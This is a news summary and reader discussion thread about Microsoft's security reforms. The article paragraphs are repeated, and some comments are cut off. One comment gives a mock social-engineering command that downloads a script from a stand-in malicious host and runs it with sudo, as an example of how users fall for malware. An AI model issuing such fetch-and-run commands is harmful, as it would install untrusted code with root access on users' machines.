Microsoft Tightens Digital Defenses with Sweeping Security Overhaul (geekwire.com) 32
Microsoft unveiled detailed security reforms Monday, five months after CEO Satya Nadella pledged to prioritize cybersecurity following major breaches. The 25-page Secure Future Initiative report [PDF] outlines technical and governance changes addressing criticisms in an April 2024 Cyber Safety Review Board report that deemed Microsoft's security culture "inadequate."
Microsoft said it implemented significant security upgrades to its Entra ID and Microsoft Account systems, introducing Azure-managed hardware security modules for access token signing keys. The company has also purged 5.75 million inactive tenants to minimize potential attack vectors and adopted a new testing system with secure defaults to prevent legacy-related security issues. Concurrently, Microsoft has enhanced its network tracking capabilities, now monitoring over 99 percent of its physical network through a centralized inventory system, which aids in firmware compliance and logging.
Internal security measures have been tightened, with engineering teams facing stricter access controls. Personal access tokens are now limited to seven days, SSH access has been disabled for internal engineering repositories, and access to critical engineering systems has been restricted to fewer groups. Additionally, Microsoft has extended its audit log retention period to a minimum of two years, bolstering its ability to investigate and respond to potential security incidents.
Microsoft said it implemented significant security upgrades to its Entra ID and Microsoft Account systems, introducing Azure-managed hardware security modules for access token signing keys. The company has also purged 5.75 million inactive tenants to minimize potential attack vectors and adopted a new testing system with secure defaults to prevent legacy-related security issues. Concurrently, Microsoft has enhanced its network tracking capabilities, now monitoring over 99 percent of its physical network through a centralized inventory system, which aids in firmware compliance and logging.
Internal security measures have been tightened, with engineering teams facing stricter access controls. Personal access tokens are now limited to seven days, SSH access has been disabled for internal engineering repositories, and access to critical engineering systems has been restricted to fewer groups. Additionally, Microsoft has extended its audit log retention period to a minimum of two years, bolstering its ability to investigate and respond to potential security incidents.
Skipping (Score:3)
"Satya Nadella pledged to prioritize cybersecurity" - someone pick the needle up, the sound is skipping again and repeating the same old tune.
Re: (Score:2)
"Satya Nadella pledged to prioritize cybersecurity" - someone pick the needle up, the sound is skipping again and repeating the same old tune.
Maybe "cybersecurity" has a different meaning to Microsoft?
Re: (Score:2)
It essentially means "Please do not force any kind of regulation or liability in us! We will put up a show for you if you if you do not!" Of course, they will just remain their crappy self. They cannot do anything else. Building up a real security culture takes decades and people they do not have.
Re: (Score:2)
Re: (Score:2)
Internal security measures have been tightened, with engineering teams facing stricter access controls. Personal access tokens are now limited to seven days, SSH access has been disabled for internal engineering repositories
Is anyone else reading this as "we've rounded up twice the usual number of suspects"?
Re: (Score:2)
> Maybe "cybersecurity" has a different meaning to Microsoft?
They keep using that word. I do not think it means what they think it means.
I think they're serious this time (Score:5, Interesting)
It's just like back in the day with viruses Microsoft cracked down on them with the help of the DOJ and they dried up. Yeah I know there's still a bunch of them out there but I knew people working at computer shops at the time and they noticed when Microsoft did the crack down because it massively impacted their bottom line because there were much less of the quick and easy virus removals that were there bread and butter.
Microsoft isn't going to be able to stop every single thing but they'll be able to do a hell of a lot and I don't think they're going to have much choice or they're going to start losing major business contracts. Or worse Washington will step in and regulate them
Re: (Score:2)
Who are they going to lose these major business contracts to? Big business is locked into the Microsoft ecosystem and it would cost a great deal of money to get out.
Re:I think they're serious this time (Score:4, Interesting)
I would think any state agencies may have the highest risk (and I myself even as a fan of Windows would say government operations should operate on as much open source as possible) but all it takes is one or two places willing to take the leap to snowball. The perception of companies moving off MS is damaging enough to warrant a response.
I would agree with GP that Microsoft is one of those American firms that not only needs regulation but is important enough to warrant some degree of state ownership. Intel, Boeing, Qualcomm and other examples where these companies are so unique in their positions that the risk of them falling under mismanagement without some degree of measurable public input is just too much.
These companies, like it or not, have an effect on everyone's lives, shareholder return cannot be the only metric they consider even just as a matter of national security.
Re: (Score:2)
and I myself even as a fan of Windows would say government operations should operate on as much open source as possible
Is that secure though? A dumb system admin who creates an insecure network is suddenly better because the software is open source? Remember it's 2024, very few attacks happen directly on the OS level these days. I mean just yesterday we were running stories about github users being told to hit win+r and run a powershell command that installs malware on their machine, ... and people actually fall for that shit. Having the command being "wget http://totallynotmalware.com/n... [totallynotmalware.com] && sudo ./notsuspect.sh"
Re: (Score:2)
Is there any reason it shouldn't be secure? Is there any reason a bunch of properly admined systems running Linux or BSD be less secure than a properly setup Windows system? Doesn't matter the OS a stupid user can bring down a system and an improperly admined box will allow them to do it.
In that sense it's not really a matter of security it's a matter of principle. Outside of things that fall under natsec software the government uses should be FOSS and auditable by the public just the same and I want the g
Re: (Score:2)
> shareholder return cannot be the only metric they consider even just as a matter of national security
That sir, is one of the most un-American things I have read today. :)~
Re: (Score:2)
Change begins at home (Score:2)
We're going to have to do the lifting in the development team level. Companies and other large enterprises are not going to address this within any short term horizon. It will be corporate buzzwords, strategic initiatives, 'thought leader patterns', Gartner/McKinsey consultant speak, etc. without any real action.
Suggest: /.'er) as "on other people's computers"
1. Start referring to the cloud (thanks
2. Start referring to pretend 3 year LTS (Long Term Support) releases as, short lifespan releases
3. Start ref
Re: (Score:2)
There's too many nation states fucking with insecure software right now. It's at the point where Microsoft is in danger of losing important contracts.
I don't think that is the issue. I think this is a knee jerk reaction to Crowdstrike, because really what's the alternative? Linux? The fundamental problem is not Windows security, it's administration. The same idiots who create insecure systems on one network will do so on another. The same dumb users sitting on one OS diligently following the instructions in that phishing email, will do so in another.
The majority of actual meaningful attacks these days have nothing to do with the OS. They are attacks on t
So what they're actually saying... (Score:2)
If only they'd put as much effort into securing their faulty software as they put into telling everyone that they're going to do it.
Re:So what they're actually saying... (Score:5, Insightful)
If only they put as much effort into that as they did into cramming unwanted AI, intrusive "it would be a felony for even a slightly smaller company to try this" intrusive spyware and adware, remote installation of software without authorization, unnecessary UI changes because we have to look "new", subscriptions for things that shouldn't require a subscription, forced use of online services that would reduce your attack surface if they weren't used, and pretty much anything else they've done post Windows 7, the world would be a better place.
Re: (Score:3)
I was going to write the same thing, but you beat me to it. Makes me think that "a million" other people had the same thought. If only MS actually listened or cared.
Re: (Score:3)
Microsoft, like many large corporations, no longer needs customers to survive. Sure, as an abstract concept we make certain good numbers go up, but as soon as that's no longer the case they'll stop having us as customers and exist as some weird paper entity that mints money.
Re: (Score:1)
Indeed. But you do not get rich by selling a quality product. MS got rich by pretending to sell a quality product and no liability if somebody finds out what it actually is. And having tons of fanbois with zero insight.
Re: (Score:2)
Mostly they got to where they are by holding the anterior lobes of the posteriors of business CEOs, CIOs, etc. "Look it, all this computer crap is confusing for you, we'll hold your buns for you so you don't have to."
What self-respecting CEO, CIO, etc. could ignore a pitch like that, it allowed them to get on with what they do best, "boldly leading into a synergistic future" and not pay any mind to all that confusing computer crap.
Now they had accountants who could do it for them...sez so right on the ledge
Re: (Score:2)
And that too. That is no way to select critical systems though and the cost is raising. Last year, cybercrime in Germany was 206B EUR, that is 2600EUR per person per year. About one average monthly salary. And most of that is due to Microsoft or the crappy ecosystem they have created.
While they will be leaving mass amounts (Score:3)
Re: (Score:2, Troll)
They are just putting on a show. They do not mean these statements seriously. MS will never produce secure systems or software or clouds unless they face liability. The very point of this show is so that they can continue to make crappy software with no liability.
How about Windows? (Score:3)
Great. Now fix your broken OS that allowed a single ClownStrike update to crater systems globally.
You know, do a sanity check on kernel extensions, and notify the systems operator whenever they are pushed. And make them easily disabled on boot. And make it clear that a new one has loaded before Windows shits the bed.
You're darned right security culture is inadequate.
Re:How about Windows? (Score:4, Informative)
Uh, it happened to Linux too.
Re: (Score:2)
No, it did not. Windows became inaccessible. On Linux you had a few minutes after boot to fix things. That is a difference like day and night.
Only for show (Score:2)
Just wait a year or two and they will be heir crappy self again.
Users (Score:3)
Users are the weak link in Windows security. Eliminate them and Microsoft will go a long way towards its security goals.
Users are closely followed by the power plug. Just don't plug in a Windows box and it will be impervious to external attacks.
They'll ditch SSH ... 'nuff said about this ... (Score:3)
I almost fell off my chair laughing when I read that. It's now the hot wave of the future, everything with access tokens and Microsoft Authenticator and Microsoft whatever, all spread across a dozen domains, of which at least 2 are inoperable at every given point in time.
Holy shit, they've disabled that one protocol which actually works.
Good thing I don't work there.
And yet (Score:1)